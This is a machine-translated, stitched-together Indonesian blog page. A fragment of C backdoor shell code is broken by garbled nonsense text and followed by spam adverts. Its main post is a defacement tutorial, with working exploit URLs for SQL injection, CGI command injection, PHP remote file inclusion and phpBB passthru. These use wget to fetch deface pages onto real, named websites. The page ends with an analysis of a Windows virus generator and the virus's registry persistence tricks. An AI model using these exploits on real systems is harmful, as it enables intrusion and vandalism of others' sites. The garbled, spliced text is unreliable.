FD_SET (scli, & fds);
if (select ((pty> scli)? (pty +1): (scli +1),
& fds, NULL, NULL, NULL) <0)
(
break;
)
if (FD_ISSET (pty, & fds)) (
int count;
count = read (pty, buf, BUF);
if (count <= 0) break;
if (write (scli, buf, count) <= 0) break;
)
if (FD_ISSET (scli, & fds)) (
int count;
unsigned char * p, * d;
d = buf;
count = read (scli, buf, BUF);
if (count <= 0) break;
/ * Setup win size * /
p = memchr (buf, ECHAR, count);
if (p) (
unsigned char wb [5];
int rlen = count - ((ulong) p - (ulong) buf);
struct winsize ws;
/ * Wait for rest * /
if (rlen> 5) rlen = 5;
memcpy (wb, p, rlen);
if (rlen <5) (
read (scli, & wb [rlen], 5 - rlen);
)
/ * Setup window * /
ws.ws_ypixel = ws.ws_xpixel = 0;
ws.ws_col = (wb [1] <<+ wb [2];
ws.ws_row = (wb [3] <<+ wb [4];
ioctl (pty, TIOCSWINSZ, & was);
kill (0, SIGWINCH);
/ * Write the rest * /
write (pty, buf, (ulong) p - (ulong) buf);
rlen = ((ulong) buf + count) - ((ulong) p +5);
want to pay the debt money debt
if (rlen> 0) write (pty, p +5, rlen);

100000000000000000 looking 100,000,000,000 for


the bailiffs round great guy nana
100000000000000000000000000000 yadi
100000000000000000000000000000000000000 child
attended a child to follow in the bath when I want to
leave the house when I want to walk up the car 100
meters from the house following children yadi
1000000000000000000000000000000000000000000
000000000 extraordinary grand nina mugiroh haris
) Else
if (write (pty, d, count) <= 0) break;
)
)
close (scli);
close (sock);
close (pty);
waitpid (subshell, NULL, 0);
vhangup ();
exit (0);
)
close (scli);
)
)

/ * EOF * /

50 Rb ONLY MONEY SYSTEM FOR AUTO-NEW!

SMS SOFTWARE ONLY 50Rb - HUNTER RUPIAH 2Jt/Hr


RP.3JUTA INCOME IN A DAY LIKE SAYA.HAN

GOLD PRODUCING SYSTEM FASTEST!


YOU look for referrals AND DEFINITE SUCCESS

WOW! EVERY DAY TO 1.5 MILLION IN ACCOUNTS


DEFEATED. NO BUSINESS PROMOTION AND DEFINITE SUCCESS

YOUR promoted Pasive PENGELOLA and income


You look for Downline and certainly Success

Rp.5.115.206 MY MONEY IN 1 DAY

KumpulBlogger.com

→ Comments yah | Permalink |

Deface Steps
Posted 7 October 2005 in Hacking at 23:25 → 18 blogger comments
Deface php nuke site

Go to the site www.google.com


then type =>
allinurl: .com / nuke / index.php or
allinurl: .org / nuke / index.php.
Well ... .. kalo udah ketemu target the steps
The next is:
1. www.target.com / nuke / index.php
2. www.target.com / nuke / admin.php =>
index.php wrote above was changed
into admin.php
3. Enter this bug behind this site:

? AddAuthor & op = budakbaonk & add_aid = add_name =


God & add_pwd = scum & add_email =
sandal_karet@yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

eg: www.target.com / nuke / admin.php?


op = AddAuthor & budakbaonk & add_aid = add_name =
God & add_pwd = scum & add_email =
sandal_karet@yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo not want your site in the path tsb udah nya ama admin.
But the reply successfully, then the url / browsing lu appear
www.target.com/nuke/admin.php?op=mod_author

5. There lu in send login, enter your id & password lu said.


Remember?
id = budakbaonk => clay wrote above earlier
password = scum => clay wrote above earlier
Well lu skrg udah into the "Administration Menu" tsb site.
Lu means tsb udah mengusai site skrg! He he he he he
Skrg lu select image Mobile (no writing underneath Messages),
Column title =>

Column content =>

Column expiration => unlimited


trus click the tab add messages imaginable under
Kalo udah, open url / new browsing and then type this target site,
eg www.target.com / nuke or www.target.com / nuke / index.php
nobody kalo lu deface results try clicking refresh tab imaginable
in addition to the above reply url / browsing lu

========================================

Deface asp / iis with using win 98

1. Click the Icon "My Computer" on your computer.


2. Search Icon "Web Folders" in My Computer It.
3. Klick again Icon "Add a web folder" and will appear
"Type the location to add".
4. Type the name of the site we will deface / add files
http://www.52down.com example. Then click Next.
5. Appeared "Enter the name for this Web Folder", then click Finish.
if there is no "finish" it or "Error" means not dideface
so you must find another target.
6. When was successful, return to the Web Folder, there we see
There http://www.52down.com file. Click the file tsb site.
7. Open the file "Hacked.html" you had (kalo no html files,
lu create html files used in the store in ms.fronpage company trus lu)
keep a copy and then return to file http://www.52down.com,
you paste the file "test.html" earlier. If you can not paste it means
adminnya've dipath same, so you must find another target.
8. When was successful, we see the result in the url / browsing
eg http://www.52down.com/Test.html
want to pay the
9. If you want to search for targets the way he kept looking at www.go

debt money debt 100000000000000000 looking


100,000,000,000 for the bailiffs round great guy nana
100000000000000000000000000000 yadi
100000000000000000000000000000000000000 child
attended a child to follow in the bath when I want to
leave the house when I want to walk up the car 100
meters from the house following children yadi
1000000000000000000000000000000000000000000
000000000 extraordinary grand nina mugiroh
harisogle.com
type allinurl: .com / index.asp or allinurl: .org / default.asp
live creativity you find the target.
Or it could find the target in http://www.zone-h.org/en/defacements/
click the right side mirror yg (yg windows 2000),
Watch his target => Defacer: Infektion Group
Domain: www.namatarget.com <<it is the target

=======================================

how to make html:

Open ms.frontpage, click the tab above format, trus select backgrounds,
trus select enable hyperlinks, trus select background color,
select color black, trus ok
Trus yg select the tab above the center (middle level) ms.word kayak,
no.5 select the font size (18pt), trus select the font color (yg image A),

select color red, kalo udah Hacked by writing your nick name,
hit enter 3 times Trus type
Hey Admin ... ... .. do you a need help? trus enter once,
trus write Matrix.Dal.Net - # surabayahack, trus enter 3 times
Kalo kalo mau pake insert an image select the tab above, trus select pictures,
trus select from the file ...., in the file name type
http://www.finagro.gov.co/902.gif or search for jpg files / gif in the pc lu
trus ok Kalo mau pake music select the format above,
select backgrounds trus trus select general tab,
the "background sound location" type
http://www.indonesia.go.id/berkibar.mid or search for midi files on pc lu
trus its ok Utk keep select the file above, select save as ...
File name: Hacked or your nick name, trus ok
Note: if time lu store there files out
"Save embedded file" select "set action" trus select "dont save" trus ok
Tough for a preview of the results choose the tab at the bottom.

=======================================

Deface guestbook (guest book)

By using SQL Injection techniques, we can mendeface guestbook


(guestbook) both file php, asp, cfm, cgi, html and kawan2. Ingat2 not
all guestbook can dideface.
His langkah2

I. Find target guestbook at www.google.co.id with type


site: my guestbook.php or site: com bukutamu.php
II. Kalo udah it can target, for example www.namatarget.my / guestbook.php
the essentials need to do is fill the guestbook kolom2 yg available.
Lu did not need to fill his column guestbook with original identity,
aja false identity enough.

example:

Name: puppets funny


Email: boneka_2005@yahoo.com

Website: www.boneka-lucu.com
Origin: doll shop
Comments:

Note baik2 imaginable in order comment field, in good


SQL Injection into the guestbook they will be, there we will enter
an image (jgn porn huh? not allowed lho?
dimarah ntar mama). Trus click the "submit" button or anything
his sky-guestbook tsb. Next open url / new browsing trus
target type was www.namatarget.my / guestbook.php
Kalo results have not been there, try clicking the tab "refresh" next url / browsing
lu. Well ... come deh yg we enter the picture earlier in the guestbook tsb.
That means they will be able dideface guestbook.

Note:
Kalo is not no picture, there is only writing yg

means guestbook dideface tsb can not. Lu jgn disappointed dong!


yg target another search.

III. Kalo yg udah appears we enter the picture earlier,


tsb guesbook open again. More content kolom2 trus yg guestbook available.
example:

Name: deface
Email: deface_2005@yahoo.com
Website: www.deface.com
Origin: virtual worlds
Comments:

Note baik2 imaginable in order comment field, with the way SQL Injection into the guestbook they
will be, there we will enter the script for deface.

Note:
Before entering the script above lu said, need to edit his first match kata2
lu desire.
IV. Click the "submit" button or what it's called sky-guestbook tsb.
Next open url / new browsing this target type trus www.namatarget.my / guestbook.php
Kalo results have not been there, try clicking the tab "refresh" next url / browsing lu.
Well ... come deh results we deface the guestbook tsb.

======================================

deface with sql injection asp

1. open browsing / url www.google.co.id


2. type site: go.id login.asp
his example we can target www.namatarget.com / login.asp
3. type your username and pass' or '='
4. open one by one file is there
5. search file we can change / deface
6. open browsing / url new type trus his target was such www.namatarget.com
7. his reply no results, click the tab next refresh url lu

======================================

deface cgi

https: / / bronte.netpresence.com.au / ~ wolfsecu / coartcds / Web_store / web_store.cgi? page =


coart_frontpage.html <<<file the original
tambahin | pwd | diujungnya
| pwd | <<<command / bug for linux / unix

https: / / bronte.netpresence.com.au / ~ wolfsecu / coartcds / Web_store / web_store.cgi? page =


coart_frontpage.html | pwd |

wrote out on the web target is / home/sites/site52/users/wolfsecu/web/coartcds/Web_store


ok ...... more
https: / / bronte.netpresence.com.au / ~ wolfsecu / coartcds / Web_store / web_store.cgi? page =
coart_frontpage.html | http://www.geocities.com/nusantarajaya_2004/arai.html wget-O / home /
sites/site52/users/wolfsecu/web/jh.htm |
love distance of 1 site with wget space lu
-O <<this letter-big O, not zero
how tough it => https: / / bronte.netpresence.com.au / ~ wolfsecu / arai.html
... / Home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<<note baik2
.../home/sites/site52/users/wolfsecu/web/jh.htm <<<note baik2
... / coartcds / Web_store <<<got dumped
how to find the target => allinurl.cgi * page: .* html + site:. http://www.google.co.id/search?
q=allinurl.cgi% us or 3Fpage% 3D *. html + site:. com & hl = en & lr = & start = 10 & sa = N
its targets must tip his html file to add the reply | pwd |

=======================================

cgi deface II

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id |

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd |

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo "Hacked by
psychophysiological. Hey admin ... do you a need help? Matrix.Dal.Net - surabayahack "> /
usr/home/web/users/a0004481/html/adspro/jh.html |
http://www.sports-media.org/adspro/jh.html

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm <<file the original


| id | <<<<<<<<<<<<<<< for clayey server user imaginable tsb
| pwd | <<<<<<<<<<<<< be tough for a server file tsb
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd | >>>>>>>
usr/home/web/users/a0004481/html / adspro / cgi-bin / adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< note baik2
usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< note baik2
<<<<<<< cgi-bin/adspro removed
clay index.html file => http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|
whereis% 20index.html |
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo "Hacked by
psychophysiological. Hey admin ... do you a need help? Matrix.Dal.Net - surabayahack ">
decae.html | & cart_id = 9721374.5730

http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo% 20

======================================

deface with php injection

http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4
the original file
modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path =
it's a bug

http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?

so index.php? name = PNphpBB2 & file = index & c = 4 disposed


how to inject it http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
unix command dikotak enter
wget http://geocities.com/nusantarajaya_2004/arai.html
his way clay http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html

http://www.narnia-chroniken.de <<<front page of deface

http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?

type: pwd
cd / homepages/7/d117874362/htdocs; wget deface file

========================================

deface with php injection II

2Fom% http://www.giphted.com/index.php?siteName=pics% 2Findex.php


the original file
http://www.giphted.com/index.php?
siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak enter: pwd


so 2Fom% pics% 2Findex.php disposed
how to inject it http://www.giphted.com/index.php?
siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak enter: http://www.geocities.com/nusantarajaya_2004/arai.html wget-O / export / home /
beangyy / www / arai.html
his way clay http://www.giphted.com/arai.html

=========================================

deface phpbb / forum

http://www.bpmpt.go.id/forum/index.php
the original file
includes / db.php? phpbb_root_path =
it's a bug
be disposed index.php

http://www.bpmpt.go.id/forum/includes/db.php?
phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?

dikotak enter: pwd


Kalo out "Hacking attempt" means dipath
But the reply is successful, it's up to the apain lu ... ...

==========================================

deface phpbb / forum II

http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
the original file
& highlight =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd
it's a bug

how to inject it http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight =%


2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd

his way there wget 3 ways:


1.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & highlight =% 2527.passthru ($
HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / /
geocities.com/nusantarajaya_2004/arai.html ; ls
2.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & highlight =% 2527.passthru ($
HTTP_GET_VARS [a]).% 2527 & a = wget% 20http: / /
geocities.com/nusantarajaya_2004/arai.html -O / var/www/singapore/jh2.htm
3.http: / / singapore.bluejackings.net / viewtopic.php? T = 51 & highlight =% 2527.passthru ($
HTTP_GET_VARS [a]).% 2527 & a = LWP-download% 20http: / /
geocities.com/nusantarajaya_2004/arai . html; ls
its way to the usual 3 colorable.
his way clay http://singapore.bluejackings.net/arai.html

=========================================

how clay fs without login

http://www.friendster.com/useropen.php?uid =
<<<<<< Enter his id number

===========================================

deface with php injection III

directly in the fire boss biar aja ga lama2


www.target.com/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
colonialism succeeded as usual
cmd php sql injection
for access to the folder nyari
cmd => find /-perm 777-type d
klo folder permision denied means we can ga apa2 in that folder
yg ga search folders have made perm
take this example

http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?

Access for the folder [commndnya above]


cmd => find /-perm 777-type d
'll eat B / w
patient jd aja
=== Example-perm denied ==
find: / mnt/drive2/lost + found: Permission denied
find: / proc / tty / drivers: Permission denied
find: / proc/1/task/1/fd: Permission denied
that means no access
we are looking for another reply
try tp yg folder / var / www /
There also klo ga gpp
there is another reply
/ home / httpd / vhosts / hdca.org / httpdocs / downloads => examples folder can reply
cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; [OSnya basic command]
[base command OSnya] => wget, dir, cat, rm, rv-rf etc
skarang we wget
cd / home / httpd / vhosts / hdca.org / httpdocs / downloads; wget
http://www.geocities.com/nusantarajaya_2004/arai.html
try lo enter
to cmdnya
-------------------
-10:35:01 - Http://www.geocities.com/nusantarajaya_2004/arai.html
=> `Arai.html '
Resolving www.geocities.com ... 66.218.77.68
Connecting to www.geocities.com [66.218.77.68]: 80 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 6.021 [text / html]
0k ... .. 100% 98.21 KB / s
10:35:02 (98.21 KB / s) - `arai.html 'saved [6.021 / 6.021]
-------------------
that means success to save
because httpdocs
easy way liatnya
/ home / httpd / vhosts / hdca.org / httpdocs / downloads => www.hdca.org/downloads/ [file deface
lo]
example www.hdca.org / downloads / arai.html
selsai deh
not easy

http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/

http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk =

http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?
&cmd=id; pwd

http://img143.imageshack.us/img143/6782/hacked8lc.jpg

http://www.sobatpadi.net/download/

http://www.sinjai.go.id/profil.php?
kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;
pwd; ks% 20-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

Click to Comment | Permalink |

Vulnerabilities pesan.php
Posted 21 September 2005 at 16:29 hrs Hacking → Just one person who commented
Open www.google.co.id trus type allinurl: .org / pesan.php
Kalo udah it can be the target of his example: http://policewives.org/pesan.php
trus liat Clik here to sign in message. Http://policewives.org/pesan.php?op=add link
Inject messages in the column with the script:
Kalo is his image that can dideface.
Kalo is not no picture, writing imaginable means not only can dideface.
Jgn disappointed! yg target another search.
Kalo Furthermore, there was his picture we inject the script again with deface guestbook (See
tutorial deface guestbook).
FINISHED!

→ Comments yah | Permalink |


Page 50 of 51 «First ...« 4748495051 »

- Arai --
Only the ordinary man who many flaws ...

"If I die tomorrow ... I'd be allright Because I believe ... ... That after were gone ... The spirit carries
on"
View blog authority

Past is history. The Future is a Mystery ... Today is Grace

New Comment
Affiliate on Beritajitu.com SCAM SEO Contest:: Very interesting. A scientific approach to
success ...

ShepardEBONY28 on NPWP Personal:: Every body understands that humen's life seems to be ...

Reon on Who Said Jesus bachelor's life:: BY AL-QURAN AND THE GOSPEL (who now often ...

hanif IM on Woro-Woro Discussions and Launch of book "The Book enthusiast: 100 Note reversed
Book":: ...

Through coup ElliottINES on Democracy:: I strictly recommend not to hold off until you get ...

Hot Comments
»Tutorial Carding - 105
»" Irena Handono wrote a funnel Mualaf MUI "Really? - 93
»The title might be" HOPE THE Sinner "- 81
»Surabaya Underground - 78

Categories
Open | Close
Curhatan (45)
Way of life ba ...
Finally terb ...
Maja insult Main
Is this "P. ..
Good morning ...
Abstinence Surrender
Through the coup ...
The title may ...
Whether what Jud ...
Ngelindur?
Between tanggu ...
Fuel beneran t. ..
Like GOLPU ...
What is sala ...
Looks like you ...
Thx Babe ...
Quiet ...
White doves ...
He said the love ...
They know it ...
The dream was to ...
RAS is not ...
My Missing ...
When I'm Fa ...
Ketenggengan ...
Project yg te ...
Syukurku
Creation of K. ..
The Art of Lo ...
Agnez Lidya ....
Who I am?
Should be happy ...
She'll come b. ..
Finally Berk ...
Sisi Lain
God Too ...
New Original Mud ...
FUCK
Beach Love
Prayer
Wild ...
Melow ya ...
Remembering ade ...
uh ... suck ....
Miss U ALL
Hacking (15)
Disable Regedit
Yahoo adu credit ...
Integramod Po ...
Mambo compone ...
Fastpublish C. ..
Bug The Day
Carding Tutorial
Remote Shell ...
Detik.com
Barontok Viru ...
Nmap Tutorial
Backdoor Bindtty
Step-Langk ...
Vulnerabilit ...
Carelessness ...
Graffiti (80)
Domain Available
Finally terb ...
Good morning ...
Asia Carrera ...
Nyaliku kissed ...
How to menghila ...
Oath Seneng ...
Commission Only CIB ...
Pen plotters ...
Through the coup ...
The title may ...
Different Smoking ...
Survey EDITION ...
Besides Pahlaw ...
Behind Silence ...
Ngelindur?
Personal NPWP
Fuel beneran t. ..
Like GOLPU ...
What is sala ...
Roy Suryo Kem ...
Sleep dreams
Hanya Untukmu
Engineering licked
GAY couples ...
Survey ISSUE ...
Fate Not P. ..
Poetry Lulu Wa ...
I MISS U
That night ...
Cuman Seven K. ..
Experience ...
He said the love ...
They know it ...
Se'enggaknya ...
The PencariMU
Wedding On Line
I'm Turning a Blind Eye
Blessings in Bul ...
Rumah Idaman ...
Who Love Me ...
Forbidden!
"Hey" ... !
Hates not a sissy
Surabaya Unde ...
14 Guidelines for Life
Live or Life
Travel
Biggest Lies
Men days ...
Paranormal Be ...
Finally, the B. ..
Fact Pah ...
N GUY?? O. ..
One night i. ..
Marhaban Ya R. ..
Surabaya Unde ...
Love Songs
Cayoooo ...
Lagu Rindu
True realists
Jewish?
Atheism and Ah ...
Lock nut
Suharto's Fami ...
Sapa ya?
Hosting effort ...
Quote of the ...
"Email from S. ..
ARF.Net Ujan
Recognition of Mother ...
"Irena Handon ...
Lover Heart
Proclamation & ...
about JESUS ...
CONFLICT theology ...
Who Said ...
Should Yesu ...
News ttg Na ...
Sejah mystery ...
Disagree (17)
Through the coup ...
Survey EDITION ...
"Doggy Style" ...
Do You Need a Guru
Personal NPWP
Fuel beneran t. ..
Why the ...
Welcome Back!
He said the love ...
They know it ...
Marry ... Mar ...
Dhani said "M. ..
What narcissist na ...
As Prose ...
Ga reason to ...
Reverend and U. ..
No More
Links (12)
SEO contest Di ...
Woro-Woro Dis ...
How to menghila ...
Agus ... Agus
Different Smoking ...
Aneka Express ...
Java Programm ...
Behind Silence ...
Acts No Sem ...
Hoo
Campaign Blog ...
Think this
Film (2)
Oath Seneng ...
ONE-ye ...
Laughed Dunk (1)
Agus ... Agus
Archive
Open | Close
2010 (2)
January (2)
SEO contest Di ...
Domain Available
2009 (26)
July (1)
Way of life ba ...
June (3)
Woro-Woro Dis ...
Finally terb ...
Maja insult Main
May (2)
Is this "P. ..
Good morning ...
April (3)
Asia Carrera ...
Nyaliku kissed ...
How to menghila ...
March (5)
Oath Seneng ...
Abstinence Surrender
Commission Only CIB ...
Pen plotters ...
Agus ... Agus
February (7)
Through the coup ...
The title may ...
Different Smoking ...
Survey EDITION ...
Whether what Jud ...
Aneka Express ...
Besides Pahlaw ...
January (5)
Java Programm ...
Behind Silence ...
"Doggy Style" ...
Do You Need a Guru
Ngelindur?
2008 (26)
December (4)
Between tanggu ...
Personal NPWP
Fuel beneran t. ..
Like GOLPU ...
November (4)
What is sala ...
Roy Suryo Kem ...
Why the ...
Sleep dreams
October (4)
Hanya Untukmu
Engineering licked
GAY couples ...
Welcome Back!
June (2)
Survey EDITION ...
Looks like you ...
May (1)
Thx Babe ...
April (2)
Quiet ...
Fate Not P. ..
March (4)
Poetry Lulu Wa ...
White doves ...
I MISS U
That night ...
February (4)
Cuman Seven K. ..
Experience ...
He said the love ...
They know it ...
January (1)
Se'enggaknya ...
2007 (37)
December (3)
Marry ... Mar ...
The dream was to ...
The PencariMU
November (1)
Wedding On Line
October (2)
I'm Turning a Blind Eye
Blessings in Bul ...
September (7)
RAS is not ...
Rumah Idaman ...
My Missing ...
When I'm Fa ...
Who Love Me ...
Ketenggengan ... How to Create Virus in instantly!

Remember the Aksika virus? Virus "open source" is one that does have a lot of variants. No wonder
because the source code is not provided free on the Internet, so anyone can easily modify and
compile the source code and be a new variant.

Starting from the ease of that, many viruses maker or a beginner programmers trying to make a
virus without the need to bother. Most needed is knowledge about the operating system and
programming.

But convenience is not how, when compared to using the program Virus Generator. From the name
alone, we can expect the use of the program. Yes, Virus Generator is a program to be able to make
the virus easily and instantly.

Starting from a sample of a virus that pretty much sent by readers to us. PC Media Antivirus
Gen.FFE know her name, Dawn, but other antivirus which is also called by the name Brontok.D.
With a simple investigation finally note that the virus was made using a Virus Generator.

Fast Firus Engine (FFE)


Generator makers are calling the program with a homemade Firus Fast Engine. As seen in the
program or site creators, he told me that this program is only for learning purposes and not for
destructive actions. Still, if this program had fallen into the wrong hands, would be used for
destruction.

Generator virus was created using Visual Basic language and in-compress using tELock packer. In
the package there are two files, namely Fast Firus Engine.exe and data.ex_. Fast Firus Engine. exe
is the main program in the making of the virus and while the file is actually a body data.ex_ original
virus that has not dimodifi kasi.

When Firus Engine.exe Fast file is run, the user will be confronted with an interface. You just told
to fill in the name of the virus, the name of manufacturer, and his message. Then by pressing the
Generate button, it will be your virus.

The workings of the generator is actually very simple. He just added the data you enter this file to
the end of the original virus (data.ex_). Later this information is used by the virus in the process of
infection.

How virus infect?


Virus creation FFE does look simple. Just as the generator, he also created using Visual Basic
language to be compiled with Native-Code method. Then the tELock to compress using the smaller
size. This virus has the original size of 55,296 bytes.

When the virus is executed first time, he will make some master files in several locations. Like in
the directory \% WINDOWS% \, will have a file with nama.exe, Win32 exe, activex.exe, and%
virusname% (the name of the virus according to the manufacturer filled by the Generator). In \%
WINDOWS% \% system32% \ will have copy.pif files, _default.pif, and surif.bin. In addition, he
also alter or create a Oeminfo.ini file that is part of the System Properties. So if your computer is
infected by the virus results generated from FFE, then the System Properties will have the words
"Generated by Fast Firus Engine".

In the directory \% WINDOWS% \% System% \'ll have some more master files that use the same
name as the file system of Windows, such as csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost.
exe, and winlogon.exe.

And do not forget, the root drive will have a file named "read euy.txt" which contains the messages
from the creator of the virus. So when creating a virus using the generator, then the manufacturer
will be served some input boxes, such as the Author of the virus, Name of the virus, and Messages.
Now, the contents of this message box that will appear in the file "read euy.txt" it.

After the virus managed to copy a file to their parent in the system, he will run the main file before,
so that the memory process will have some viruses, such as csrss.exe, winlogon.exe, LSASS. exe,
smss.exe, svchost.exe, and winlogon.exe. Process names similar to the process / services of
Windows is probably on purpose to deceive users. To distinguish them, you can see the path or the
location of the executed process. Process virus usually run on System directory as the process /
services are running Windows property usually comes from System32 directory.

Changing Registry
This virus adds a startup item on the registry so when he can start running Windows automatically
or to change the settings of Windows to suit his desires. Information about the registry that the
reversal will not be able to easily see that the encrypted condition.

What he changed was the way the value of Userinit items by adding parameters to the parent file. At
key HKEY_CURRENT_ USER \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Windows \
Load item will also be changed to point to a file with the name of the parent Activex.exe. In the
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ will have a
new item with a present. Key HKEY_ LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \
CurrentVersion \ Run \ will have new items as well with the default name and% username%,
username here is the name of the current user at the time.

Virus generated from the FFE results also change the shell extension for the file. Exe, namely by
changing the type of information from the Application to File Folder. Setting the Options folder is
also modified to not show the extension and each fi le with hidden attributes. And that can be active
at the safe-mode, he also changed the value of the item SafeBoot.

By using the help of registry Image File Execution Options, the virus also adds a new item on the
section with the name of cmd.exe, msconfi g.exe, regedit.exe and taskmgr.exe. The point is that
every user who accesses the program with the file name like that, it will be bypassed by Windows
and transferred to the main file of the virus.

How Viruses Spread?


This virus can spread through the data storage media such as flash disks. When you plug the flash
disk on the infected computer, then the flash disk will have some new files, like explorer.exe,%
virusname%. Exe, and msvbvm60.dll. Also some support files such as desktop.ini, autorun.inf
running so that he could automatically when accessing the flash disk.

Another virus files were stored in a new directory in the flash disk with the name of the file
containing the Recycled Firus.pif and Folder.htt. All of these virus files hidden in conditions that are
not visible.

Virus Action
To survive, the virus will try to block any program that he did not want such tools or programs,
including antivirus PCMAV. Just as the changed registry data, data about what programs are
blocked by it is also present in the body in a state encrypted.

So, when the virus was stay in memory, he will monitor each program accessed by the user, ie by
reading the file name and window caption. Some of the files are tested for antiviral dibloknya is
nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, and many
others. Including some or installer setup program can not run on the infected computer.

Prevention and Control


PC Media Antivirus RC19 was able to clean infected computer completely and accurately 100% of
each virus that is made by using Firus Fast Generator. To avoid action by the virus to block
PCMAV, please rename the file first instance PCMAV PCMAV-CLN.EXE be MERDEKA.EXE.

Laptop Sale at the moment Russia's horrible Ended (Video!)

You might also like:

Clubbing photos Niken Anjani!


The car transformed into an aquarium fish!
List of highest-paid player in the Football League Indonesia!
Projecting Presenter KPI Properties Disallow Homosexual! LinkWithin

Sumbangkan terjemahan yang lebih baik


Terima kasih telah menyumbangkan saran terjemahan Anda ke Google Terjemahan.
Menyumbangkan terjemahan yang lebih baik:
How to Create Virus in instantly! <br> <br> <br> <br> <br>Remember the Aksika virus? Virus
&quot;open source&quot; is one that does have a lot of variants. No wonder because the source
code is not provided free on the Internet, so anyone can easily modify and compile the source code
and be a new variant. <br> <br>Starting from the ease of that, many viruses maker or a beginner
programmers trying to make a virus without the need to bother. Most needed is knowledge about
the operating system and programming. <br> <br>But convenience is not how, when compared to
using the program Virus Generator. From the name alone, we can expect the use of the program.
Yes, Virus Generator is a program to be able to make the virus easily and instantly. <br>
<br>Starting from a sample of a virus that pretty much sent by readers to us. PC Media Antivirus
Gen.FFE know her name, Dawn, but other antivirus which is also called by the name Brontok.D.
With a simple investigation finally note that the virus was made using a Virus Generator. <br>
<br>Fast Firus Engine (FFE) <br>Generator makers are calling the program with a homemade
Firus Fast Engine. As seen in the program or site creators, he told me that this program is only for
learning purposes and not for destructive actions. Still, if this program had fallen into the wrong
hands, would be used for destruction. <br> <br>Generator virus was created using Visual Basic
language and in-compress using tELock packer. In the package there are two files, namely Fast
Firus Engine.exe and data.ex_. Fast Firus Engine. exe is the main program in the making of the
virus and while the file is actually a body data.ex_ original virus that has not dimodifi kasi. <br>
<br>When Firus Engine.exe Fast file is run, the user will be confronted with an interface. You just
told to fill in the name of the virus, the name of manufacturer, and his message. Then by pressing
the Generate button, it will be your virus. <br> <br>The workings of the generator is actually very
simple. He just added the data you enter this file to the end of the original virus (data.ex_). Later
this information is used by the virus in the process of infection. <br> <br>How virus infect?
<br>Virus creation FFE does look simple. Just as the generator, he also created using Visual Basic
language to be compiled with Native-Code method. Then the tELock to compress using the smaller
size. This virus has the original size of 55,296 bytes. <br> <br>When the virus is executed first
time, he will make some master files in several locations. Like in the directory \% WINDOWS% \,
will have a file with nama.exe, Win32 exe, activex.exe, and% virusname% (the name of the virus
according to the manufacturer filled by the Generator). In \% WINDOWS% \% system32% \ will
have copy.pif files, _default.pif, and surif.bin. In addition, he also alter or create a Oeminfo.ini file
that is part of the System Properties. So if your computer is infected by the virus results generated
from FFE, then the System Properties will have the words &quot;Generated by Fast Firus
Engine&quot;. <br> <br>In the directory \% WINDOWS% \% System% \&#39;ll have some more
master files that use the same name as the file system of Windows, such as csrss.exe, winlogon.exe,
lsass.exe, smss.exe, svchost. exe, and winlogon.exe. <br> <br>And do not forget, the root drive will
have a file named &quot;read euy.txt&quot; which contains the messages from the creator of the
virus. So when creating a virus using the generator, then the manufacturer will be served some input
boxes, such as the Author of the virus, Name of the virus, and Messages. Now, the contents of this
message box that will appear in the file &quot;read euy.txt&quot; it. <br> <br>After the virus
managed to copy a file to their parent in the system, he will run the main file before, so that the
memory process will have some viruses, such as csrss.exe, winlogon.exe, LSASS. exe, smss.exe,
svchost.exe, and winlogon.exe. Process names similar to the process / services of Windows is
